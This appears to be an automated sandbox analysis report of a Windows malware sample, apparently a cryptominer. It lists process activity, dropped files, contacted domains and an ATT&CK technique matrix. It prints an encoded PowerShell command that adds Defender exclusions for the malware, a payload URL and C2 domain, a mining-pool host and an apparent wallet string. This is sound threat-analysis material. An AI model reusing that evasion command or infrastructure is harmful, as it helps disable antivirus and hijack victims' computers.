Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.com/	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Process created: C:\Windows\explorer.exe explorer.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Process "https://google.com"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcageababmag8abgbzafwarablahmaawb0ag8acabcagyaaqbsagualgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcageababmag8abgbzafwarablahmaawb0ag8acabcagyaaqbsagualgblahgazqa7aeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabdadoaxabvahmazqbyahmaxabhagwazgbvag4acwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwavwbpag4azabvahmaqwbqafuacwb5ahmadablag0algblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcageababmag8abgbzafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabxagkabgbkag8acwbdafaavqbzahkacwb0aguabqauaguaeablaa==
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcageababmag8abgbzafwarablahmaawb0ag8acabcagyaaqbsagualgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcageababmag8abgbzafwarablahmaawb0ag8acabcagyaaqbsagualgblahgazqa7aeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabdadoaxabvahmazqbyahmaxabhagwazgbvag4acwbcaeeacabwaeqayqb0ageaxabsag8ayqbtagkabgbnafwavwbpag4azabvahmaqwbqafuacwb5ahmadablag0algblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcageababmag8abgbzafwaqqbwahaarabhahqayqbcafiabwbhag0aaqbuagcaxabxagkabgbkag8acwbdafaavqbzahkacwb0aguabqauaguaeablaa==			Jump to behavior

Source: explorer.exe, 00000008.00000003.2804259244.0000000003218000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzhttps://woo097878781.win/P.txtC:\Windows\explorer.exe - Program Manager185.157.162.21646YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB
Source: explorer.exe, 00000008.00000003.2804259244.0000000003218000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\explorer.exe - Program Manager

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	Queries volume information: C:\Users\user\AppData\Roaming\WindosCPUsystem.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: explorer.exe, 00000008.00000003.2193150014.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2215570251.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: explorer.exe, 00000008.00000003.2215824447.0000000000CC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2193150014.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2194188224.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2215570251.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000003.2216408265.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	31 Windows Management Instrumentation	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Disable or Modify Tools	OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	43 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	11 Scheduled Task/Job	1 Windows Service	1 Abuse Elevation Control Mechanism	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	1 Registry Run Keys / Startup Folder	512 Process Injection	2 Obfuscated Files or Information	NTDS	351 Security Software Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Scheduled Task/Job	1 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	171 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	171 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	512 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	24%	ReversingLabs
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\orupcopicsyv.sys	5%	ReversingLabs
C:\Users\user\AppData\Roaming\WindosCPUsystem.exe	24%	ReversingLabs

Source	Detection	Scanner	Label
https://woo097878781.win/P.txt	0%	Avira URL Cloud	safe
https://woo097878781.win	0%	Avira URL Cloud	safe
https://woo097878781.win/66/api	0%	Avira URL Cloud	safe
https://woo097878781.win/66/api/endpoint.php39	0%	Avira URL Cloud	safe
https://woo097878781.win/66/api8	0%	Avira URL Cloud	safe
https://woo097878781.win/66/api/endpoint.php	0%	Avira URL Cloud	safe
https://woo097878781.win/P.txtC:	0%	Avira URL Cloud	safe
https://woo097878781.win/P.txtZ	0%	Avira URL Cloud	safe
https://woo097878781.win/P.txtl	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
google.com	172.217.17.46	true	false	high
www3.l.google.com	142.250.181.142	true	false	high
plus.l.google.com	172.217.17.78	true	false	high
play.google.com	172.217.19.238	true	false	high
www.google.com	142.250.181.132	true	false	high
pool.hashvault.pro	5.188.137.200	true	false	high
woo097878781.win	154.216.20.243	true	false	high
ogs.google.com	unknown	unknown	false	high
apis.google.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.google.com/client_204?atyp=i&biw=1034&bih=870&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&opi=89978449	false		high
https://www.google.com/xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=aLUfP?xjs=s4	false		high
https://www.google.com/xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/ck=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/ujg=1/rs=ACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog/m=NzU6V,syyx,sygo,zGLm3b,syvy,syvz,syvp,DhPYme,syy3,syxy,syy1,syy0,sywi,sywj,syxz,syxw,syxx,KHourd,MpJwZc,UUJqVe,sy7o,sOXFj,sy7n,s39S4,oGtAuc,NTMZac,nAFL3,sy81,sy80,q0xTif,y05UD,sy12k,sy192,sy18w,syx4,sy18p,syx3,syx2,syx1,sy18v,sy13u,sy18m,sy13y,sy18u,sy12g,sy18q,syh2,sy13z,sy18x,sy126,sy18t,sy18r,sy18s,sy18z,sy18h,sy18n,sy18g,sy18l,sy18i,sy18d,sy14u,sy141,sy142,syx9,syxa,epYOx?xjs=s3	false		high
https://www.google.com/xjs/_/js/md=2/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCEAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/rs=ACT90oE8aTDhxVJ6ryzMKSmV26RPmG6BpA	false		high
https://www.google.com/xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=syt5,syt4,VsqSCc,sy1b7,P10Owf,sy19z,sy19x,sysj,gSZvdb,syyf,syye,WlNQGd,sysn,sysl,sysk,sysi,DPreE,syys,syyq,nabPbb,syy9,syy7,sylx,sypx,CnSW2d,kQvlef,syyr,fXO0xe?xjs=s4	false		high
https://www.google.com/gen_204?atyp=i&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&vet=10ahUKEwjl7q77mKOKAxWr2wIHHXlOFrQQuqMJCCY..s&bl=D9Ku&s=webhp&lpl=CAUYATACOANiCAgQEMCW2cUB&zx=1734039627429&opi=89978449	false		high
https://www.google.com/images/hpp/ic_wahlberg_product_core_48.png8.png	false		high
https://www.google.com/complete/search?q&cp=0&client=gws-wiz&xssi=t&gs_pcrt=2&hl=en&authuser=0&psi=QVhbZ6XKF6u3i-gP-ZzZoAs.1734039622974&dpr=1&nolsbt=1	false		high
https://www.google.com/xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/ck=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCBAB2AQIEAAAAAMAAAAgCEAQBAEIAAhCAFQAAwgFQBgBAAQABCAXgUabACjABBGQAgBKAxJ75AaBABAACAAKAAWTQEIgKQCgABAACQAIAAAgAAAAYEkAgAEAHQAAYACIBABA9CAAAAAAgCEDAnQCwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiSgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/ujg=1/rs=ACT90oHfkAOiN8D6dktf_Sl5r3y4r4Hiog/m=sb_wiz,aa,abd,sy17o,syfz,syfr,syfp,syfq,syfs,syg0,syg1,syfw,syfv,syfu,syep,syft,syfj,syfi,syfk,syfh,syfm,sy16j,sygb,sy17m,syyl,syga,syg9,syg8,async,ifl,pHXghd,sf,syig,sy3kp,sonic,sy3kv,syhl,syh1,sy3k7,sy3ka,sy274,sye3,sy9u,sy9f,sy9e,sy9c,spch,syti,syth,rtH1bd,sy19k,sy15l,sy151,sy12b,sydb,sy19i,SMquOb,sy7k,sy7j,syf3,syfe,syfc,syfb,syf2,syf0,syey,sy86,sy83,sy85,syex,syf1,syew,sybg,syb9,sybc,syaj,syap,syai,syah,syag,sya4,syba,syax,syay,syb4,syan,syb3,syaw,syat,syae,syal,syaz,sya6,sya8,sya9,sya5,syao,syad,syaa,sybj,sya0,sy9x,sybi,sy9p,sy9h,sy9k,sy9w,sya3,syb0,syev,syeu,syer,syeq,sy89,uxMpU,syem,sybq,sybo,sybk,syar,sybm,sybh,sy8n,sy8m,sy8l,sy8k,Mlhmy,QGR0gd,aurFic,sy8w,fKUV3e,OTA3Ae,sy7l,OmgaI,EEDORb,PoEs9b,Pjplud,sy8h,A1yn5d,YIZmRd,uY49fb,sy7b,sy79,sy75,sy78,sy77,sy76,byfTOb,lsjVmc,LEikZe,kWgXee,ovKuLd,sgY6Zb,sy8v,sy8y,sy88,xUdipf,NwH0H,gychg,ZfAoz,yDVVkb,qafBPd,ebZ3mb,dowIGb,sy19n,sy19l,syxi,sytn,d5EhJe,sy1a5,fCxEDd,syut,sy1a4,sy1a3,sy1a2,sy19u,sy19r,sy19s,sy17b,sy175,syx6,syx5,T1HOxc,sy19t,sy19q,zx30Y,sy1a7,sy1a6,sy19y,sy15y,Wo3n8,sysz,loL8vb,syt3,syt2,syt1,ms4mZb,sys1,B2qlPe,syue?xjs=s3	false		high
https://www.google.com/gen_204?atyp=csi&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&s=promo&rt=hpbas.10228,hpbarr.1&zx=1734039627406&opi=89978449	false		high
https://www.google.com/xjs/_/ss/k=xjs.hd.Br47UfLWS7U.L.B1.O/am=CEgVAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAgKA7CQTCAAB2AQIEAAAAAMAAAAgCEAABAEIAAhCAFQAAQABQBgBAAQABAAUAAIDACiABBGQAgBKAhJ75AKBAAAACAAKAAWTQEIgKQCgABAAAQAIAAAgAAAAYAkAgAEAHQAAYACIBABA9CAAAAAAgCACAnQCwBDxAAAAAAAAAgAwAAABgSAEBAAAAAAAAAAAAAAAAAIJgKACgIAAAAAAAAAAAAAAAAAAAAASaIA/d=1/ed=1/br=1/rs=ACT90oGiQz2zZwyl-P4iX5JQzA0t5JlC4A/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,YV5bee,d,csi	false		high
https://www.google.com/gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&zx=1734039639112&opi=89978449	false		high
https://woo097878781.win/P.txt	true	Avira URL Cloud: safe	unknown
https://www.google.com/gen_204?atyp=csi&ei=TlhbZ4aoKai8xc8Pg5KPuQc&s=async&astyp=hpba&ima=0&imn=0&mem=ujhs.9,tjhs.12,jhsl.2173,dm.8&nv=ne.1,feid.b982ac60-12df-490b-a613-81ce59c66048&hp=&rt=ttfb.3103,st.3104,bs.27,aaft.3105,acrt.3106,art.3106&zx=1734039630514&opi=89978449	false		high
https://www.google.com/gen_204?atyp=i&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&dt19=2&prm23=0&zx=1734039627412&opi=89978449	false		high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0	false		high
https://www.google.com/gen_204?atyp=csi&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&s=webhp&t=all&imn=11&ima=2&imad=0&imac=0&ddl=1&wh=870&aftie=NF&aft=1&aftp=870&adh=&cls=0.00007500598925533399&ime=1&imex=1&imeh=0&imeha=0&imehb=0&imea=0&imeb=0&imel=0&imed=0&imeeb=0&scp=0&cb=205522&ucb=205522&ts=205822&dt=&mem=ujhs.9,tjhs.12,jhsl.2173,dm.8&nv=ne.1,feid.b982ac60-12df-490b-a613-81ce59c66048&net=dl.1100,ect.3g,rtt.800,sd.0&hp=&sys=hc.4&p=bs.true&rt=hst.82,cbt.201,prt.2778,afti.3654,aftip.2775,aft.3654,aftqf.3656,xjses.5698,xjsee.5756,xjs.5756,lcp.3661,fcp.2765,wsrt.6165,cst.1726,dnst.142,rqst.1854,rspt.965,sslt.1726,rqstt.5276,unt.3407,cstt.3550,dit.8946&zx=1734039622938&opi=89978449	false		high
https://www.google.com/gen_204?s=webhp&t=aft&atyp=csi&ei=QVhbZ6XKF6u3i-gP-ZzZoAs&rt=wsrt.6165,aft.3654,afti.3654,cbt.201,hst.82,prt.2778&imn=11&ima=2&imad=0&imac=0&ddl=1&wh=870&aftie=NF&aft=1&aftp=870&opi=89978449&dt=&ts=205822	false		high
